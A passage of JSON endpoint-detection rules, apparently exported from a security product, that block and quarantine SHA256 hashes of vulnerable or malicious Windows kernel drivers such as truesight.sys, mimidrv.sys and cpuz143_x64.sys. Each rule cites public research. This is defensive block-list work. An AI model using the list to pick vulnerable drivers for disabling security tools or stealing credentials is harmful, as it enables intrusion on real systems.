"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153367Z", + "creation_date": "2026-03-23T11:45:31.153371Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153379Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d455f42dd0e8b01958840ab3d534bee8a1c3532540b1b6b3024d1435d174717", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "61b411e1-cd92-532e-81dc-33a78c2a8a07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474423Z", + "creation_date": "2026-03-23T11:45:31.474427Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474434Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79294a62e1e87b177738b310bb4c90de6b60c02f2097562807a7f9f7bba8237d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "61bc437b-fa18-58cb-8d07-eb578321f533", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484183Z", + "creation_date": "2026-03-23T11:45:31.484209Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484220Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f28506a8904778d8daf691670cb862b079df76b29f629a2cd8dae93f7628000d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "61cbcc94-68df-55b5-8be5-9b2128626855", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145112Z", + "creation_date": "2026-03-23T11:45:32.145114Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145120Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4f9b5a2fe29c436a53d36d8a2084369ac6a8cd59b9eb01b3d3fa293f3487d3cc", + "comment": "Malicious Kernel Driver (aka driver_4f9b5a2f.sys) [https://www.loldrivers.io/drivers/b660d253-2b60-46c5-b95a-c354aa5eb154/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "61d72c1c-f906-5f69-be0a-15e5e1795a20", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478045Z", + "creation_date": "2026-03-23T11:45:30.478048Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478057Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3bf4f8cb26ba38e54636864c744aac0839e7a1d6cb7b6cf13995e8ab19b9f7f8", + "comment": "Vulnerable Kernel Driver (aka 
elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "61dcb723-1a2b-5dbe-b768-98f0753383a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815746Z", + "creation_date": "2026-03-23T11:45:30.815748Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815754Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5074f17c7cc4fdabec65b3b07132425ad0d9fefd993e896baba2f97f16277581", + "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "61dedb8b-5824-5211-bc61-89dbb2003c33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810829Z", + "creation_date": "2026-03-23T11:45:31.810831Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810837Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d332fd20e74b55500b47007c46493d34c736d046f2d9fca002ec9dc16983775", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "61e999a5-f582-5773-ac07-dce00ede1412", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146132Z", + "creation_date": "2026-03-23T11:45:31.146134Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146139Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e96d64383a9ffc94a6c10abc77324e6e9b16b86757af21aa686e3c8aa3bb9190", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"61f45de2-4287-50c6-b22a-0d54cdb428e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611711Z", + "creation_date": "2026-03-23T11:45:29.611713Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611718Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d70bfea03deeea92a253f2b4a8b7181a3064f62c5207f94b5f7ce5a9e62ab4cf", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "61fee31e-8a79-5d07-acf8-ff7aca4184f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824024Z", + "creation_date": "2026-03-23T11:45:30.824026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.824032Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb1874b72bd6d05c9fbef698c45a6da126ae430433fe1c16dec8ef095379e6b4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "620b583f-76cc-59c9-93ed-13258f0a02fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474152Z", + "creation_date": "2026-03-23T11:45:31.474156Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474165Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f58a54da72384be4633924060d8553d6b1a46d62b64964939a61454fe277f287", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "620fcf68-3508-5af4-9de8-b357b6926d6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495188Z", + "creation_date": "2026-03-23T11:45:31.495190Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495196Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d16dfca503373fddcc71e64f064cae1e2e9295bedaa345aa5388235478687b53", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6219657a-a4c1-5614-a2c5-41da03de1284", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831830Z", + "creation_date": "2026-03-23T11:45:30.831832Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831837Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "20f0823320229b75f2f39f86e7499203ad06f3d52c03487ce7629c4b1a4819be", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62218011-9d18-5d19-a93f-4e2d6c75c809", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465483Z", + "creation_date": "2026-03-23T11:45:30.465486Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465495Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ce4f8089b02017cbe86a5f25d6bc69dd8b6f5060c918a64a4123a5f3be1e878", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62248f3a-5ddb-5b43-a3dc-84304e6f2456", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830259Z", + "creation_date": "2026-03-23T11:45:30.830261Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830266Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b55e7f88289ce8018bdda56e1445b2f72f18dc29a6d3ba8e88da6a7bf83468f2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6224d19b-84a1-51c6-81bb-01a5e08c659a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815527Z", + "creation_date": "2026-03-23T11:45:31.815528Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815534Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9c7959f399de15f1d8cc13e269ff773d6f73361c7ab1f056921acb20dd514fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6238d482-e9ea-5437-a858-e666d3f2e55e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481024Z", + "creation_date": "2026-03-23T11:45:30.481026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481032Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89bc3cb4522f9b0bf467a93a4123ef623c28244e25a9c34d4aae11f705d187e7", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "623e65ae-dd4b-5dbb-8a53-578c2ef43a08", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970349Z", + "creation_date": "2026-03-23T11:45:29.970351Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970356Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d43520128871c83b904f3136542ea46644ac81a62d51ae9d3c3a3f32405aad96", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "624a845d-4fa4-50c8-b549-efee40e8def0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829067Z", + "creation_date": "2026-03-23T11:45:31.829071Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829080Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "966e8ab3a72e03b2be20ef9dae055a74a2b242603669115c6b8a33f01f273616", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6251c1c3-83b7-5d95-8d7b-898d2f4e3737", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817661Z", + "creation_date": "2026-03-23T11:45:31.817664Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817672Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "070596ced6796cbf129925caa24bf3fd9b6d28f029bab9fdb772f44a0dd94f5d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62587e2d-1b27-52ce-bbc1-736d526b4644", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159176Z", + "creation_date": "2026-03-23T11:45:31.159178Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159183Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a6f5a86311ba878bce8c0873b8bee0866e0eb1f9123c08fb528bd046c0daea9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "625b9626-014e-53bc-a9e3-3073a71a1339", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821527Z", + "creation_date": "2026-03-23T11:45:30.821530Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821539Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e642d82c5cde2bc40a204736b5b8d6578e8e2b893877ae0508cfa3371fc254dc", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "626043a4-b23a-5d27-8cbb-53c6f107cc29", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147604Z", + "creation_date": "2026-03-23T11:45:31.147606Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147612Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "84ff6cc24ef5d3b6ec34f60122b1a007e69c7ab8b1de225c95e2ee96ef3ba33c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62608842-7df0-5f8b-b786-92d62e8a147e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479296Z", + "creation_date": "2026-03-23T11:45:30.479298Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479304Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f020137cb08f86c48810780209a3f4a1fac361ed089ade61c1b5d6c64ded7872", + "comment": 
"Vulnerable Kernel Driver (aka VBoxTAP.sys) [https://www.loldrivers.io/drivers/f22e7230-5f32-4c4e-bc9d-9076ebf10baa/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "62700c3b-224a-51d8-8e3e-1a870216fb0f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467384Z", + "creation_date": "2026-03-23T11:45:30.467388Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467397Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "054c2b8c5e89a2bff72eb6e1169537cf8654b614d9aac1e1e3d8ea02343872fc", + "comment": 